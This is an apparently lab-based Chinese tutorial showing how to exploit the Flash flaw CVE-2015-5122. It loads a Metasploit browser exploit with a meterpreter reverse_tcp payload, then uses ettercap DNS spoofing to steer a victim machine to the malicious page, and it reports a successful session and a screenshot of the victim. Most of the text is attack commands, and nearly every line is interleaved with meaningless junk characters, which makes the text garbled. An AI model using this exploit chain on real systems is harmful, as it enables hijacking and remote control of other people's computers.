* e( q* R: F# I" _. l( I 二、cve2015-5122漏洞实例演示虚拟机 1 u: U: w! {. G+ |
! \, D7 ~- Y! t$ t( b
) H" u( P! R2 _/ I- N 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
% z9 H$ x6 y( w4 a) q- }* A% U 1 ?/ \7 s; z; p& K6 _) |* M7 H
5 G+ f' c0 [: @; j2 X$ c. F; w
search cve-2015-5122如图: ; i( N8 q7 t+ ^
# ?2 |) |8 Y/ e$ Y
2 d! ~ d' m3 `8 Y! O$ h0 E/ g
% m5 M O, f6 k F8 g
# P! \( \ _ @/ K; k! a; o
# c: ~7 Z! B/ O: E; M
下面我们敲如下命令: ! `* L7 E9 p! C" i" h! S8 I& L$ z
0 v" \' W" g/ ^3 P0 K- ]0 w! n; c$ e4 d: {* C
use exploit/multi/browser/adobe_flash_opaque_background_uaf
& `; h1 |4 q: E& @ + b; N) A: ^7 a9 d. F, k; F( I
% C, @7 @' b( Q% O! u! t set PAYLOAD windows/meterpreter/reverse_tcp
! W4 s: x2 M/ p% t. }2 `2 q) p & Q8 W( f5 q/ O) Q- o( h& v9 y
/ w- s/ W" K z g0 v6 w set LHOST 192.168.0.109
' j/ b$ P# O0 e: \ ~0 h 6 l1 j7 ?0 J) M/ @
5 |7 w- K' k+ c, x4 u6 Q2 l set URIPATH / /*根目录*/ 0 u+ E. v/ o- z5 {+ T
1 [ D& _$ i6 G; E$ ]; r
9 Z1 @# t* J8 F% ~ set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 ' d5 u B* k1 d/ n8 ^; R
% R F& U, p( E! c5 x$ `7 Y/ [
5 n" W! Q2 C, m set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 # @' _. C3 j! N1 t! v9 V4 B% C" C( h
. X+ f! u# b# H
8 J' D( @$ J* E( f- j
然后show options如图: - V- N. A I o' w7 ?4 d
4 B. e* W1 [8 _7 Y: z( `# u
- i( P; d O2 X
8 n9 `; v. _2 ]9 i5 r% j, F 2 M$ q( P- [' Z, W4 R
o$ h, y! x! n8 J3 ~6 q* i' `' K
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
+ x0 C! P' l0 q. n" @7 K 4 P* x* g8 A7 Q
, [" w& p5 E! N- a6 A1 m' t
$ R2 D/ P0 R$ E' d7 m 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
1 Z c3 k# p3 J8 G Y7 } ) j+ {4 r" k7 u5 A8 z) C' C% ^" Z
7 N. D( p- D5 @+ R* L$ Q Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf ; K* R' h4 R9 d1 c8 X% [
. {: k4 h9 @) P* U5 r
4 M8 X& M8 F, {; K( z
. z" `+ a5 X1 ]8 |2 M& ~ * h+ o$ x9 b3 T- w' ` ]
* o8 {, F% X: X! w 成功了,这时候我们断开ettercap,如图: g) H* y; Q% c
5 O B1 U4 A4 I% u4 ^2 U
* ^! j" C4 c: x- z- z/ T# m
Z7 ~4 n9 q. `9 H4 d( _8 B$ P / L- P/ q' N' p" @! ~$ D+ n6 T$ K
$ u& F# n/ Q# `# v9 s1 e& ~ Screenshot如图: 7 y- g# d/ {+ L6 o4 T: D. H4 V
9 P) a' l d# H# U
. U0 w8 W6 G+ D, ]2 I9 l 9 K2 U; {, }7 q' }) x
% V' V6 z6 F' O' k- @ K$ V- S% n
6 R. i. u4 d' G8 I* j) ]6 l8 M
* T( y8 F( F A- F |